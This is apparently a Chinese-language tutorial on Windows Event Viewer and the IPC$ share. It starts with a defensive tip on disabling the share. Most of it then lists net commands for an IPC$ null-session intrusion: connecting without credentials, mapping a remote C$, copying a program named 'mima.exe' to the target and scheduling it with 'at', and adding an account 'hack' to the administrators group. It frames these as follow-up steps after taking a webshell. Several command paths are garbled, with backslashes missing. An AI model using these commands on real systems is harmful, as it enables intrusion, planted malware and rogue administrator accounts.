我们日常的win系统出现问题,比如被盗被登录,事件记录是必看的,想要共享给局域网文件,又需要共享服务。下面我们来看看这些日常小知识吧。
事件查看器
事件查看器主要用于管理员的排除查看登录记录,黑客入侵退出时都会清空他的登录信息,以免追查。
点击“事件查看器”可以看到事件点击后下面有详情。
以此排查具体问题。
共享文件夹
点击“共享文件夹”进入“共享”可以看到有个IPC$,在上面右键 停止共享。
知识讲堂
IPC$:空连接,在目标计算机打开IPC$的情况下可以空连接上去查看对方文件夹,无需用户名和密码,现在安装系统大多都会自动关闭。
一般在拿下网站权限后在webshell执行他进一步控制服务器或者电脑上有人故意攻击偷偷开启。
net share ipc$
开放目标的 ipc$ 共享;
net share ipc$ /del
关闭目标的 ipc$ 共享;如果你要给它开共享文件夹,你可以用:
net share c=c:\
Win+r 打开“运行”
输入cmd确定,之后打入命令开启c盘共享,通过net share看到已经成功开启了
执行如图操作 共享就会删除。
建立空连接 : net use \127.0.0.1ipc$"" /user:"" 连接上目标计算机
删除连接 :net use \127.0.0.1ipc$/del
连接成功后在 ipc$ 连接中对远程主机的操作命令
查看远程主机的共享资源(看不到默认共享) :net view \127.0.0.1
查看远程主机的当前时间 :net time \127.0.0.1
映射 / 删除远程共享 :net use z:\127.0.0.1c
此命令将共享名为 c 的共享资源映射为本地 z 盘
net use z: /del 删除映射的 z 盘,其他盘类推
向远程主机复制文件 :
copy路径 文件名\IP共享目录名,如:
copy c:mima.exe\127.0.0.1c$即将 c 盘下的 mima.exe 复制到对方 c 盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy \127.0.0.1c$mima.exe c:\
远程添加计划任务 :
at \IP时间 程序名 如:
at \127.0.0.0 11:00 mima.exe
注意:时间尽量使用 24 小时制;如果你打算运行的程序在系统默认搜索路径(比如 system32/ )下则不用加路径,否则必须加全路径
本地命令
查看本地主机的共享资源(可以看到本地的默认共享)
net share
得到本地主机的用户列表
net user
显示本地某用户的帐户信息
net user帐户名 比如net user administrator
显示本地主机当前启动的服务
net start
启动 / 关闭本地服务
net start 服务名 举例:net start services
net stop 服务名 举例:net stop services
在本地添加帐户
net user帐户名 密码 /add 举例:net user hack hack /add
激活禁用的用户
net uesr 帐户名/active:yes 举例:net user guest/active:yes
加入管理员组
net localgroup administrators帐户名/add
举例:net localgroup administrators hack/add 将hack添加到管理组
